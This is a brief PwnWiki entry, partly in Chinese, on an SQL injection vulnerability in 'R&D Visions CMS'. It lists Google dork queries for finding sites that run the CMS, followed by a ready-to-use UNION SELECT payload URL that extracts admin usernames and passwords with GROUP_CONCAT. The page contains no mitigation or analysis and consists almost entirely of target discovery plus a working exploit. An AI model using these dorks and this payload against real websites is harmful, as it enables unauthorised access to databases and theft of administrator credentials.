R&D Visions CMS SQL注入漏洞

From PwnWiki

Google Dork

intext:"Website by R&D Visions" inurl:.php?id=

intext:"CMS System by R&D Visions"

Payload

https://www.0-sec.org/home.php?newid=-53+Union+Select+1,Group_ConCat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12+From+admin_user_log--+
Retrieved from "https://pwnwiki.com/index.php?title=R%26D_Visions_CMS_SQL注入漏洞&oldid=2472"